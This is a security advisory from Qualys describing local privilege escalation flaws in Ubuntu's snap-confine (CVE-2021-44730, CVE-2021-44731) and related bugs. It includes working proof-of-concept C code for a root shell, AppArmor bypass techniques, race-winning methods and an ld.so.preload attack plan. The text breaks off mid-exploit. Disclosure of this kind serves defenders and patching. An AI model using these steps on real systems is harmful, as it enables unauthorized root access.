Qualys Security Advisory Oh Snap! More Lemmings (Local Privilege Escalation in snap-confine) ======================================================================== Contents ======================================================================== Summary Two minor bugs An unexploitable bug CVE-2021-44730: Hardlink attack in snap-confine's sc_open_snapd_tool() CVE-2021-44731: Race condition in snap-confine's setup_private_mount() - Case study: Ubuntu Server, near-default installation - Case study: Ubuntu Desktop, default installation CVE-2021-3996: Unauthorized unmount in util-linux's libmount CVE-2021-3995: Unauthorized unmount in util-linux's libmount CVE-2021-3998: Unexpected return value from glibc's realpath() CVE-2021-3999: Off-by-one buffer overflow/underflow in glibc's getcwd() CVE-2021-3997: Uncontrolled recursion in systemd's systemd-tmpfiles Acknowledgments Timeline "Some of the new puzzles are superb and will have you scratching your head for some time as you check out all the possible routes and find most of them are red herrings." -- John Sweeney (1992). "Oh No! More Lemmings". New Atari User (55). ======================================================================== Summary ======================================================================== We recently audited snap-confine (a SUID-root program that is installed by default on Ubuntu) and discovered two vulnerabilities (two Local Privilege Escalations, from any user to root): CVE-2021-44730 and CVE-2021-44731. "Snap is a software packaging and deployment system developed by Canonical for operating systems that use the Linux kernel. The packages, called snaps, and the tool for using them, snapd, work across a range of Linux distributions and allow upstream software developers to distribute their applications directly to users. Snaps are self-contained applications running in a sandbox with mediated access to the host system." (Wikipedia) "snap-confine is a program used internally by snapd to construct the execution environment for snap applications." (man snap-confine) Discovering and exploiting a vulnerability in snap-confine has been extremely challenging (especially in a default installation of Ubuntu), because snap-confine uses a very defensive programming style, AppArmor profiles, seccomp filters, mount namespaces, and two Go helper programs. Eventually, we discovered two vulnerabilities: - CVE-2021-44730, a hardlink attack that is exploitable in a non-default configuration only (when the kernel's fs.protected_hardlinks is 0); - CVE-2021-44731, a race condition that is exploitable in default installations of Ubuntu Desktop, and near-default installations of Ubuntu Server (the default installation, plus one of the "Featured Server Snaps" that are offered during the installation; for example, "heroku" or "microk8s"). While working on snap-confine, we also discovered several vulnerabilities in related packages and libraries: CVE-2021-3996 and CVE-2021-3995 in util-linux (libmount and umount), CVE-2021-3998 and CVE-2021-3999 in the glibc (realpath() and getcwd()), and CVE-2021-3997 in systemd (systemd-tmpfiles). We partially published these secondary vulnerabilities in January 2022, shortly after their patches became available: https://www.openwall.com/lists/oss-security/2022/01/10/2 https://www.openwall.com/lists/oss-security/2022/01/24/2 https://www.openwall.com/lists/oss-security/2022/01/24/4 If you enjoy puzzle games like Lemmings (which turns 31 this year!), then we hope that you will enjoy this advisory. ======================================================================== Two minor bugs ======================================================================== Don't let your eyes deceive you -- Lemmings, Fun Level 15 We almost abandoned our audit after a few days, because snap-confine is programmed very defensively, and it has been thoroughly reviewed before (by Matthias Gerstner of the SUSE Security Team): https://www.openwall.com/lists/oss-security/2019/04/18/4 https://bugzilla.suse.com/show_bug.cgi?id=1127368 Nevertheless, we decided to continue our audit because we spotted two minor bugs (probably typos) and began to suspect that nastier bugs might be hiding in snap-confine. Both minor bugs are located in the main() function: ------------------------------------------------------------------------ 433 sc_identity real_user_identity = { 434 .uid = real_uid, 435 .gid = real_gid, 436 .change_uid = 1, 437 .change_gid = 1, 438 }; 439 sc_set_effective_identity(real_user_identity); ... 466 if (getresuid(&real_uid, &effective_uid, &saved_uid) != 0) { 467 die("getresuid failed"); 468 } ... 494 // Permanently drop if not root 495 if (effective_uid == 0) { ... 498 if (setgid(real_gid) != 0) 499 die("setgid failed"); 500 if (setuid(real_uid) != 0) 501 die("setuid failed"); 502 503 if (real_gid != 0 && (getuid() == 0 || geteuid() == 0)) 504 die("permanently dropping privs did not work"); 505 if (real_uid != 0 && (getgid() == 0 || getegid() == 0)) 506 die("permanently dropping privs did not work"); 507 } ... 542 execv(invocation.executable, (char *const *)&argv[0]); ------------------------------------------------------------------------ The "real_gid" at line 503 should be "real_uid", and the "real_uid" at line 505 should be "real_gid". This first bug does not have dangerous consequences, because the lines 503-506 are basically defense-in-depth checks: the lines 498-501 have already checked that the root privileges were dropped successfully. Moreover, the second minor bug prevents snap-confine from actually entering the code block at lines 495-507: the effective_uid at line 495 is in fact not 0 anymore, because the effective uid was set to the real, unprivileged uid at lines 433-439, and the effective_uid variable was set to this unprivileged uid at lines 466-468. This second bug may seem serious at first glance, because it prevents snap-confine from calling the privilege-dropping functions setuid() and setgid() (at lines 498-501) before a user-controlled program is executed (at line 542). In reality this does not have dangerous consequences: the only remaining privileged uid (the saved uid) is automatically reset to the effective, unprivileged uid by the execve() syscall (at line 542). Despite their practical uselessness, these two minor bugs motivated us to continue our audit, and we are deeply grateful to them. ======================================================================== An unexploitable bug ======================================================================== DON'T PANIC -- Oh No! More Lemmings, Crazy Level 19 We also discovered a minor bug in the sc_call_snap_update_ns_as_user() function: ------------------------------------------------------------------------ 112 const char *xdg_runtime_dir = getenv("XDG_RUNTIME_DIR"); 113 char xdg_runtime_dir_env[PATH_MAX + strlen("XDG_RUNTIME_DIR=")]; 114 if (xdg_runtime_dir != NULL) { 115 sc_must_snprintf(xdg_runtime_dir_env, 116 sizeof(xdg_runtime_dir_env), 117 "XDG_RUNTIME_DIR=%s", xdg_runtime_dir); 118 } ... 127 char *envp[] = { ... 132 xdg_runtime_dir_env, NULL 133 }; 134 sc_call_snapd_tool_with_apparmor(snap_update_ns_fd, 135 "snap-update-ns", apparmor, 136 aa_profile, argv, envp); ------------------------------------------------------------------------ If we execute snap-confine without an XDG_RUNTIME_DIR environment variable, then the stack-based buffer xdg_runtime_dir_env[] is not initialized (lines 112-118), and the uninitialized contents of this buffer are passed as an environment variable to snap-update-ns (lines 127-136), a helper program that is executed with root privileges. This bug may also seem serious at first glance (because we may be able to control the contents of this uninitialized buffer), but we do not believe that it is exploitable: - snap-update-ns is a statically-linked Go program, and therefore does not process most of the "unsecure" environment variables (LD_PRELOAD, LD_AUDIT, etc); - snap-update-ns is executed with effective uid 0 but unprivileged real uid (like a SUID-root program), and therefore runs in "secure" mode (__libc_enable_secure); - snap-update-ns calls clearenv() in its bootstrap function, and thereby erases all environment variables (another layer of defense in depth). More importantly, the size of sc_call_snap_update_ns_as_user()'s stack frame (which contains the uninitialized buffer xdg_runtime_dir_env[]) is ~8KB, but the stack-frame size of sc_do_mount() (which is called before sc_call_snap_update_ns_as_user()) is ~10KB and is filled with zeros. In other words, xdg_runtime_dir_env[] is indirectly filled with zeros (by sc_do_mount()) and we cannot pass an arbitrary environment variable to snap-update-ns (just an empty environment variable). ======================================================================== CVE-2021-44730: Hardlink attack in snap-confine's sc_open_snapd_tool() ======================================================================== Easy when you know how -- Lemmings, Fun Level 17 snap-confine dynamically obtains the path to snap-update-ns and snap-discard-ns (two helper programs that are executed with root privileges) by reading its own path via /proc/self/exe (at line 166), by opening this path's directory (at line 174), and by opening the helper program inside this directory (at line 179) -- this helper program is later executed via fexecve(): ------------------------------------------------------------------------ 69 int sc_open_snap_update_ns(void) 70 { 71 return sc_open_snapd_tool("snap-update-ns"); 72 } ------------------------------------------------------------------------ 139 int sc_open_snap_discard_ns(void) 140 { 141 return sc_open_snapd_tool("snap-discard-ns"); 142 } ------------------------------------------------------------------------ 160 static int sc_open_snapd_tool(const char *tool_name) 161 { ... 166 if (readlink("/proc/self/exe", buf, sizeof buf) < 0) { ... 172 char *dir_name = dirname(buf); ... 174 dir_fd = open(dir_name, O_PATH | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC); ... 179 tool_fd = openat(dir_fd, tool_name, O_PATH | O_NOFOLLOW | O_CLOEXEC); ... 184 return tool_fd; 185 } ------------------------------------------------------------------------ Unfortunately, if we are able to hardlink snap-confine into a directory that we own, and if we execute this hardlink, then snap-confine will open our directory and execute our own, arbitrary snap-update-ns and snap-discard-ns programs, as root. Important note: this is impossible in a default configuration (although the kernel's fs.protected_hardlinks is 0 by default, the distributions set this sysctl to 1 by default). Consequently, in the following proof of concept, we exploit a default installation of Ubuntu Server whose fs.protected_hardlinks sysctl has been manually reset to 0. ________________________________________________________________________ First, failed attempt ________________________________________________________________________ First, as an unprivileged user, we make sure that the "lxd" snap (the only snap installed by default on Ubuntu Server) has been started (although it should have been started automatically at boot time): ------------------------------------------------------------------------ $ id uid=1001(jane) gid=1001(jane) groups=1001(jane) $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd /usr/lib/snapd/snap-confine --base core18 snap.lxd.daemon /nonexistent ... ------------------------------------------------------------------------ Next, we hardlink snap-confine into a directory in /tmp, and (in the same directory) we create a simple snap-discard-ns program that should eventually be executed as root: ------------------------------------------------------------------------ $ mkdir -m 0700 /tmp/.tmp $ cd /tmp/.tmp $ ln -i /usr/lib/snapd/snap-confine ./ $ cp -i "$(which true)" snap-update-ns $ cat > snap-discard-ns.c << "EOF" #include #include int main(void) { if (setuid(0)) _exit(__LINE__); if (setgid(0)) _exit(__LINE__); char * const argv[] = { "/bin/bash", "-c", "id; cat /proc/self/attr/current", NULL }; execve(*argv, argv, NULL); _exit(__LINE__); } EOF $ gcc -o snap-discard-ns snap-discard-ns.c ------------------------------------------------------------------------ Last, we execute our hardlinked snap-confine with a different base ("snapd" instead of "core18"), which forces snap-confine to restart the "lxd" snap and therefore to execute our own snap-discard-ns program: ------------------------------------------------------------------------ $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd ./snap-confine --base snapd snap.lxd.daemon /nonexistent ... DEBUG: apparmor label on snap-confine is: unconfined DEBUG: apparmor mode is: (null) snap-confine has elevated permissions and is not confined but should be. Refusing to continue to avoid permission escalation attacks ------------------------------------------------------------------------ This first attempt failed: snap-confine exited because it detected that it was "unconfined" -- it is normally confined by an AppArmor profile named "/usr/lib/snapd/snap-confine", which was not applied here because we executed /tmp/.tmp/snap-confine, not /usr/lib/snapd/snap-confine. ________________________________________________________________________ Second, failed attempt ________________________________________________________________________ To solve this first problem, we force snap-confine's AppArmor profile on /tmp/.tmp/snap-confine, by wrapping its execution in aa-exec (a tool for confining a program with an AppArmor profile): ------------------------------------------------------------------------ $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -p /usr/lib/snapd/snap-confine -- ./snap-confine --base snapd snap.lxd.daemon /nonexistent ... cannot execute snapd tool snap-discard-ns: Permission denied snap-discard-ns failed with code 1 ------------------------------------------------------------------------ This second attempt also failed, because snap-confine's AppArmor profile denied the execution of our snap-discard-ns program in /tmp: ------------------------------------------------------------------------ # dmesg | tail -n 1 [16732.767948] audit: type=1400 audit(1635093756.584:30): apparmor="DENIED" operation="exec" profile="/usr/lib/snapd/snap-confine" name="/tmp/.tmp/snap-discard-ns" pid=1777 comm="snap-confine" requested_mask="x" denied_mask="x" fsuid=0 ouid=1001 ------------------------------------------------------------------------ ________________________________________________________________________ Third, failed attempt ________________________________________________________________________ To solve this second problem, we reviewed snap-confine's AppArmor profile (in /etc/apparmor.d/usr.lib.snapd.snap-confine.real) and noticed that it allows the execution of programs in ~/.Private: @{HOME}/.Private/** mrixwlk, We therefore move our /tmp/.tmp directory to ~/.Private, and make another attempt: ------------------------------------------------------------------------ $ mkdir -m 0700 ~/.Private $ cd ~/.Private $ mv -i /tmp/.tmp ./ $ cd .tmp $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -p /usr/lib/snapd/snap-confine -- ./snap-confine --base snapd snap.lxd.daemon /nonexistent ... snap-discard-ns failed with code 10 ------------------------------------------------------------------------ This third attempt succeeded in executing our snap-discard-ns program, but failed to subsequently execute /bin/bash (again because of snap-confine's AppArmor profile): ------------------------------------------------------------------------ # dmesg | tail -n 1 [16991.232201] audit: type=1400 audit(1635094015.048:31): apparmor="DENIED" operation="exec" profile="/usr/lib/snapd/snap-confine" name="/usr/bin/bash" pid=1789 comm="6" requested_mask="x" denied_mask="x" fsuid=0 ouid=0 ------------------------------------------------------------------------ ________________________________________________________________________ Fourth, partially successful attempt ________________________________________________________________________ To solve this third problem, we noticed that snap-confine's AppArmor profile allows the transition to AppArmor profiles that are not "unconfined" and that do not start with '/': change_profile unsafe /** -> [^u/]**, and we also noticed that one of the "lxd" snap's AppArmor profiles ("snap.lxd.daemon" in /var/lib/snapd/apparmor/profiles/snap.lxd.daemon) is more permissive than snap-confine's profile. We therefore modify our snap-discard-ns program, to transition to the "snap.lxd.daemon" profile when executing /bin/bash (by writing "exec snap.lxd.daemon" to the file /proc/self/attr/exec, which is what "aa-exec -p snap.lxd.daemon" does): ------------------------------------------------------------------------ $ cat > snap-discard-ns.c << "EOF" #include #include #include int main(void) { if (setuid(0)) _exit(__LINE__); if (setgid(0)) _exit(__LINE__); FILE * const fp = fopen("/proc/self/attr/exec", "w"); if (!fp) _exit(__LINE__); if (fputs("exec snap.lxd.daemon", fp) < 0) _exit(__LINE__); if (fclose(fp)) _exit(__LINE__); char * const argv[] = { "/bin/bash", "-c", "id; cat /proc/self/attr/current", NULL }; execve(*argv, argv, NULL); _exit(__LINE__); } EOF $ gcc -o snap-discard-ns snap-discard-ns.c $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -p /usr/lib/snapd/snap-confine -- ./snap-confine --base snapd snap.lxd.daemon /nonexistent ... uid=0(root) gid=0(root) groups=0(root),1001(jane) snap.lxd.daemon (enforce) ... ------------------------------------------------------------------------ This fourth attempt succeeded in executing /bin/bash and id, but this root shell is still confined ("snap.lxd.daemon (enforce)") and we would rather obtain an unconfined root shell. ________________________________________________________________________ Fifth, successful attempt ________________________________________________________________________ To solve this fourth and last problem, we noticed that the AppArmor profile "snap.lxd.daemon" allows the unconfined execution of aa-exec: /{,usr/}{,s}bin/aa-exec ux, We therefore modify our snap-discard-ns program, to wrap the execution of our shell commands in "aa-exec -p unconfined": ------------------------------------------------------------------------ $ cat > snap-discard-ns.c << "EOF" #include #include #include int main(void) { if (setuid(0)) _exit(__LINE__); if (setgid(0)) _exit(__LINE__); FILE * const fp = fopen("/proc/self/attr/exec", "w"); if (!fp) _exit(__LINE__); if (fputs("exec snap.lxd.daemon", fp) < 0) _exit(__LINE__); if (fclose(fp)) _exit(__LINE__); char * const argv[] = { "/bin/bash", "-c", "exec aa-exec -p unconfined -- " "/bin/bash -c 'id; cat /proc/self/attr/current'", NULL }; execve(*argv, argv, NULL); _exit(__LINE__); } EOF $ gcc -o snap-discard-ns snap-discard-ns.c $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -p /usr/lib/snapd/snap-confine -- ./snap-confine --base snapd snap.lxd.daemon /nonexistent ... uid=0(root) gid=0(root) groups=0(root),1001(jane) unconfined ... ------------------------------------------------------------------------ Finally, this fifth attempt successfully executed an unconfined root shell. Although we consider this attack impractical (because the sysctl fs.protected_hardlinks is 1 by default), it gave us the idea that eventually allowed us to exploit snap-confine in a default installation: what if we were able to create a copy of the SUID-root snap-confine in a writable directory like /tmp, but without creating a hardlink? We were particularly curious about bind-mounts, because snap-confine makes extensive use of bind-mounts to set up its sandboxes. ======================================================================== CVE-2021-44731: Race condition in snap-confine's setup_private_mount() ======================================================================== It's all a matter of timing -- Oh No! More Lemmings, Havoc Level 12 To set up a snap's sandbox (more precisely, its mount namespace), snap-confine's function setup_private_mount() creates a temporary directory /tmp/snap.$SNAP_NAME/tmp (for example, /tmp/snap.lxd/tmp) -- or reuses it if it already exists -- and bind-mounts it onto the /tmp directory inside the snap's mount namespace. setup_private_mount() is programmed very defensively (f*() and *at() syscalls, O_DIRECTORY and O_NOFOLLOW flags) to avoid race conditions: ------------------------------------------------------------------------ 56 static void setup_private_mount(const char *snap_name) 57 { .. 83 sc_must_snprintf(base_dir, sizeof(base_dir), "/tmp/snap.%s", snap_name); 84 sc_must_snprintf(tmp_dir, sizeof(tmp_dir), "%s/tmp", base_dir); .. 91 if (mkdir(base_dir, 0700) < 0 && errno != EEXIST) { .. 94 base_dir_fd = open(base_dir, 95 O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW); ... 106 if (fchmod(base_dir_fd, 0700) < 0) { ... 109 if (fchown(base_dir_fd, 0, 0) < 0) { ... 114 if (mkdirat(base_dir_fd, "tmp", 01777) < 0 && errno != EEXIST) { ... 118 tmp_dir_fd = openat(base_dir_fd, "tmp", 119 O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW); ... 123 if (fchmod(tmp_dir_fd, 01777) < 0) { ... 127 if (fchown(tmp_dir_fd, 0, 0) < 0) { ... 131 sc_do_mount(tmp_dir, "/tmp", NULL, MS_BIND, NULL); 132 sc_do_mount("none", "/tmp", NULL, MS_PRIVATE, NULL); 133 } ------------------------------------------------------------------------ Unfortunately, this function is vulnerable to a race condition, because the line 131 passes an absolute path (/tmp/snap.lxd/tmp) to the mount() syscall, which does follow symlinks: - we create the directory /tmp/snap.lxd, before we execute snap-confine; - after the open() at line 94 but before the fchown() at line 109, we replace /tmp/snap.lxd with another directory that contains a symlink named "tmp" (which therefore becomes /tmp/snap.lxd/tmp) that points to an arbitrary directory; - as a result, because the mount() at line 131 follows symlinks, we trick snap-confine into bind-mounting an arbitrary directory onto /tmp inside the snap's mount namespace. This race condition opens up a world of possibilities: inside the snap's mount namespace (which we can enter through snap-confine itself), we can bind-mount a world-writable, non-sticky directory onto /tmp, or we can bind-mount any other part of the filesystem onto /tmp. We will exploit this powerful primitive in the two following case studies. Note: we can reliably win this race condition, by monitoring /tmp/snap.lxd with inotify, by pinning our exploit and snap-confine to the same CPU with sched_setaffinity(), and by lowering snap-confine's scheduling priority with setpriority() and sched_setscheduler(). ======================================================================== Case study: Ubuntu Server, near-default installation ======================================================================== Not as complicated as it looks -- Lemmings, Fun Level 8 In this first case study, we exploit a default installation of Ubuntu Server, plus one of the "Featured Server Snaps" that are offered during the installation; we abuse the snap "heroku" here, but other snaps can be abused instead (for example, "microk8s"). Our main idea is to exploit CVE-2021-44731, bind-mount the directory /usr/lib/snapd (which contains snap-confine) onto /tmp inside the snap's mount namespace, and reproduce our exploit for CVE-2021-44730 (without a hardlink): we execute /tmp/snap-confine (inside the snap's mount namespace), and force it to execute our own /tmp/snap-discard-ns program, as root. In theory, this seems impossible: if we bind-mount /usr/lib/snapd onto /tmp, then /tmp/snap-discard-ns will always be the real snap-discard-ns, not our own program. In practice, when snap-confine is executed inside a mount namespace, it first calls sc_reassociate_with_pid1_mount_ns(), which enters init's mount namespace, where /tmp is not bind-mounted: snap-confine executes /tmp/snap-discard-ns outside the snap's mount namespace, where we can create our own programs in /tmp. ________________________________________________________________________ First, failed attempt ________________________________________________________________________ In this first version of our exploit, we create an empty directory /tmp/snap.heroku and a directory /tmp/snap.XXXXXX that contains a "tmp" symlink to /usr/lib/snapd, and we exchange these two directories at the right time, to bind-mount /usr/lib/snapd onto /tmp inside heroku's mount namespace. The command we execute is "/usr/lib/snapd/snap-confine --base core snap.heroku.heroku /bin/bash -c 'sleep 10; /tmp/snap-confine --base snapd snap.heroku.heroku /nonexistent'". Note: if the "core" base is not installed, we can use the "core18" base instead, but then we must bind-mount /snap/snapd/current/usr/lib/snapd instead of /usr/lib/snapd (for glibc compatibility reasons). ------------------------------------------------------------------------ $ id uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) $ cd /tmp $ cp -i "$(which true)" snap-update-ns $ gcc -o snap-discard-ns snap-discard-ns.c $ gcc -o CVE-2021-44731-Server1 CVE-2021-44731-Server1.c $ ./CVE-2021-44731-Server1 ... DEBUG: apparmor label on snap-confine is: /usr/lib/snapd/snap-confine DEBUG: apparmor mode is: enforce ... cannot chmod base directory /tmp/snap.heroku to 0700: Operation not permitted ------------------------------------------------------------------------ This first attempt failed, because snap-confine's AppArmor profile prevented setup_private_mount() from fchmod()ing our /tmp/snap.heroku directory (at line 106): ------------------------------------------------------------------------ # dmesg | tail -n 1 [26963.479502] audit: type=1400 audit(1635180724.155:37): apparmor="DENIED" operation="capable" profile="/usr/lib/snapd/snap-confine" pid=1712 comm="snap-confine" capability=3 capname="fowner" ------------------------------------------------------------------------ ________________________________________________________________________ Second, failed attempt ________________________________________________________________________ To solve this first, seemingly insurmountable problem, we tried out a Crazy! Wild! Wicked! idea -- to execute snap-confine in "unconfined" mode, by wrapping it in "aa-exec -p unconfined": ------------------------------------------------------------------------ $ gcc -o CVE-2021-44731-Server2 CVE-2021-44731-Server2.c $ ./CVE-2021-44731-Server2 ... DEBUG: apparmor label on snap-confine is: unconfined DEBUG: apparmor mode is: (null) snap-confine has elevated permissions and is not confined but should be. Refusing to continue to avoid permission escalation attacks ------------------------------------------------------------------------ Incredibly, this idea worked out; however, snap-confine's defensive programming detected this unconfined execution and called exit(). ________________________________________________________________________ Third, successful attempt ________________________________________________________________________ Since snap-confine refuses to run unconfined, but accepts AppArmor profiles other than the intended "/usr/lib/snapd/snap-confine" profile, we reviewed all AppArmor profiles and noticed that some of them are in "complain" mode (for example, "snap.heroku.heroku"): ------------------------------------------------------------------------ # aa-status apparmor module is loaded. 35 profiles are loaded. 33 profiles are in enforce mode. ... 2 profiles are in complain mode. snap.heroku.heroku ... ------------------------------------------------------------------------ These "complain" profiles log policy violations but allow the offending program to continue its execution (unlike "kill" or "enforce" profiles); we therefore try to wrap snap-confine in "aa-exec -p snap.heroku.heroku" to bypass AppArmor: ------------------------------------------------------------------------ $ gcc -o CVE-2021-44731-Server3 CVE-2021-44731-Server3.c $ ./CVE-2021-44731-Server3 ... DEBUG: apparmor label on snap-confine is: snap.heroku.heroku DEBUG: apparmor mode is: complain ... DEBUG: execv(/bin/bash, /bin/bash...) DEBUG: argv[1] = -c DEBUG: argv[2] = sleep 10; /tmp/snap-confine --base snapd snap.heroku.heroku /nonexistent ... DEBUG: moving to mount namespace of pid 1 ... DEBUG: calling snapd tool snap-discard-ns ... uid=0(root) gid=0(root) groups=0(root),65534(nogroup) snap.heroku.heroku (complain) ... ------------------------------------------------------------------------ This third attempt successfully executed a root shell that is effectively unconfined ("snap.heroku.heroku (complain)"). Side note: we tried and failed to exploit CVE-2021-44731 in a default installation of Ubuntu Server (i.e., without an extra snap like "heroku" or "microk8s"); we faced two problems: - The "lxd" snap (the only snap installed by default on Ubuntu Server) is started automatically at boot time by snapd; this prevents us from creating /tmp/snap.lxd ourselves. The solution to this first problem is surprisingly easy, because the cron daemon is started before snapd at boot time: we can add an "@reboot touch /tmp/snap.lxd" command to our user's crontab and take ownership of this directory before snapd (on the next reboot). - No AppArmor profiles are in "complain" mode by default; this prevents us from bypassing AppArmor (the fchmod() at line 106). Interestingly, the check that prevents snap-confine from running unconfined is very fragile (a fail-open check): if aa_is_enabled() fails (if it returns false), then snap-confine assumes that AppArmor is disabled, and allows us to run it unconfined. Internally, aa_is_enabled() calls the glibc's setmntent() (fopen()), getmntent() (malloc() and fgets()), and endmntent(); for example, if we set a low RLIMIT_NOFILE resource limit, then this fopen() fails, and snap-confine continues to run unconfined: ------------------------------------------------------------------------ $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd prlimit --nofile=4 aa-exec -p unconfined -- /usr/lib/snapd/snap-confine --base core18 snap.lxd.daemon /nonexistent ... DEBUG: apparmor is not enabled: Too many open files cannot open path /proc/1/ns/mnt: Too many open files ------------------------------------------------------------------------ However, this RLIMIT_NOFILE resource limit is so low that subsequent open()s also fail and prevent snap-confine from running normally. We also tried to reach the system-wide limit on open files (fs.file-max) but failed, because systemd increases this limit to LONG_MAX (since version 240). We also tried to cause a failure in setmntent() or getmntent() by lowering the RLIMIT_DATA resource limit, but also failed. If you, dear reader, find a solution to this second problem, please post it to the public oss-security mailing list! ======================================================================== Case study: Ubuntu Desktop, default installation ======================================================================== If at first you don't succeed.. -- Lemmings, Taxing Level 1 To exploit CVE-2021-44731 in a default installation of Ubuntu Desktop, we execute snap-confine with the "snap-store" snap (the only snap that is installed by default) and we bypass AppArmor with one of the default "complain" profiles (for example, "libreoffice-soffice"). Still, inside its sandbox, snap-confine applies one of snap-store's "enforce" profiles (for example, "snap.snap-store.snap-store"), which prevents us from successfully executing /tmp/snap-confine and therefore prevents us from reusing our Ubuntu-Server exploitation technique: ------------------------------------------------------------------------ $ gcc -o CVE-2021-44731-Desktop0 CVE-2021-44731-Desktop0.c $ ./CVE-2021-44731-Desktop0 ... DEBUG: apparmor label on snap-confine is: libreoffice-soffice DEBUG: apparmor mode is: complain ... DEBUG: execv(/bin/bash, /bin/bash...) DEBUG: argv[1] = -c DEBUG: argv[2] = sleep 10; /tmp/snap-confine --base snapd snap.snap-store.snap-store /nonexistent ... DEBUG: apparmor is available but the interface but the interface is not available cannot read mount namespace identifier of pid 1: Permission denied ------------------------------------------------------------------------ Belatedly, we realized that the setup of snap-store's mount namespace is extremely complicated; indeed, snap-confine executes the helper program snap-update-ns twice: - a first time, to set up the "system" bind-mounts listed in /var/lib/snapd/mount/snap.snap-store.fstab; - a second time, to set up the "user" bind-mounts listed in /var/lib/snapd/mount/snap.snap-store.user-fstab. Among those system bind-mounts, one in particular caught our attention: /var/lib/snapd/hostfs/var/lib/app-info /var/lib/app-info none bind,ro 0 0 To set up this bind-mount, snap-update-ns must first create the directory /var/lib/app-info; but inside snap-store's mount namespace, /var/lib is in a read-only filesystem (the "core18" base's squashfs). Consequently, snap-update-ns must first create a "mimic" -- a writable copy of /var/lib: 1/ it bind-mounts /var/lib onto /tmp/.snap/var/lib (inside snap-store's mount namespace); 2/ it mounts a tmpfs onto /var/lib; 3/ it bind-mounts every directory entry from /tmp/.snap/var/lib back into /var/lib; 4/ it creates the directory /var/lib/app-info (which is in a writable tmpfs now); 5/ it bind-mounts /var/lib/snapd/hostfs/var/lib/app-info onto /var/lib/app-info. Unfortunately, because we own /tmp inside snap-store's mount namespace (thanks to CVE-2021-44731), we can race against snap-update-ns between 1/ and 3/ and replace /tmp/.snap/var/lib -- and hence /var/lib -- with our own directory tree. Note: we can reliably win this race condition by "single-stepping" snap-confine (we execute it with SNAPD_DEBUG=1, we redirect its stderr to an AF_UNIX socket with minimized SO_RCVBUF and SO_SNDBUF, we read() its output byte by byte, and we MSG_PEEK at its buffered output). This race condition allows us to replace /var/lib/snapd/mount/snap.snap-store.user-fstab with our own fstab file, which allows us to set up near-arbitrary bind-mounts inside snap-store's mount namespace. These bind-mounts are not completely arbitrary, because they are restricted by the "snap-update-ns.snap-store" AppArmor profile, whose most interesting rules are: ------------------------------------------------------------------------ 170 mount options=(rbind, rw) /tmp/.snap/*/ -> /*/, ... 762 mount options=(rbind, rw) /tmp/.snap/var/lib/*/ -> /var/lib/*/, ------------------------------------------------------------------------ Our action plan, then, is: - we create a copy of /etc (minus the unreadable files like /etc/shadow) into /tmp/.tmp/.snap/etc (which will become /tmp/.snap/etc inside snap-store's mount namespace); - we create a file /tmp/.tmp/.snap/etc/ld.so.preload (which contains the library name "/tmp/librootshell.so"), and we create a shared library /tmp/.tmp/librootshell.so (which will become /tmp/librootshell.so inside snap-store's mount namespace); - we bind-mount our /tmp/.tmp onto /tmp (inside snap-store's mount namespace) by exploiting CVE-2021-44731 (note: /tmp/snap.snap-store does not normally exist, but if it does, we can use our "@reboot" crontab trick to create it ourselves on the next reboot); - we bind-mount the contents of /tmp/.tmp/.snap/var/lib into /var/lib (inside snap-store's mount namespace) by exploiting the race condition between 1/ and 3/ in snap-update-ns; - we add the following bind-mount line to our /tmp/.tmp/.snap/var/lib/snapd/mount/snap.snap-store.user-fstab (which is effectively /var/lib/snapd/mount/snap.snap-store.user-fstab inside snap-store's mount namespace): /tmp/.snap/etc /etc none rbind,rw 0 0 - we execute snap-confine (outside snap-store's mount namespace), which reads our user-fstab file and bind-mounts our copy of /etc (inside snap-store's mount namespace) -- this bind-mount is allowed by the line 170 of the "snap-update-ns.snap-store" AppArmor profile; - we execute the SUID-root program /usr/lib/snapd/snap-confine (inside snap-store's mount namespace), which reads our /etc/ld.so.preload and therefore executes our shared library /tmp/librootshell.so, as root -- these two operations are allowed by the "snap.snap-store.snap-store" AppArmor profile: ------------------------------------------------------------------------ 34 /etc/ld.so.preload r, ... 299 /tmp/** mrwlkix, ------------------------------------------------------------------------ ________________________________________________________________________ First, failed attempt ________________________________________________________________________ Our first attempt succeeded in bind-mounting our own /etc but failed to execute a SUID-root program inside snap-store's mount namespace. Indeed, snap-confine's defensive programming detected that /var/lib/snapd does not belong to root (it belongs to us, inside snap-store's mount namespace), and called exit() (via validate_bpfpath_is_safe()): ------------------------------------------------------------------------ $ id uid=1001(jane) gid=1001(jane) groups=1001(jane) $ gcc -o CVE-2021-44731-Desktop CVE-2021-44731-Desktop.c $ ./CVE-2021-44731-Desktop ... change.go:316: DEBUG: mount name:"/tmp/.snap/var/lib/snapd" dir:"/var/lib/snapd" type:"" opts:MS_BIND|MS_REC unparsed:"" (error: ) ... $ cp -a /etc /tmp/.tmp/.snap $ echo /tmp/librootshell.so > /tmp/.tmp/.snap/etc/ld.so.preload $ gcc -fpic -shared -o /tmp/.tmp/librootshell.so librootshell.c $ mkdir /tmp/.tmp/.snap/var/lib/snapd/mount $ echo '/tmp/.snap/etc /etc none rbind,rw 0 0' > /tmp/.tmp/.snap/var/lib/snapd/mount/snap.snap-store.user-fstab $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=snap-store /usr/lib/snapd/snap-confine --base core18 snap.snap-store.snap-store /usr/lib/snapd/snap-confine ... change.go:316: DEBUG: mount name:"/tmp/.snap/etc" dir:"/etc" type:"none" opts:MS_BIND|MS_REC unparsed:"" (error: ) ... DEBUG: loading bpf program for security tag snap.snap-store.snap-store /var/lib/snapd not root-owned 1001:1001 ------------------------------------------------------------------------ ________________________________________________________________________ Second, successful attempt ________________________________________________________________________ The solution to this problem is easy; because the original, root-owned bind-mount of /var/lib still exists inside snap-store's mount namespace (we merely renamed it, during the race condition between 1/ and 3/), we can simply rename it back to /tmp/.snap/var/lib, and add the following bind-mount line to our user-fstab file: 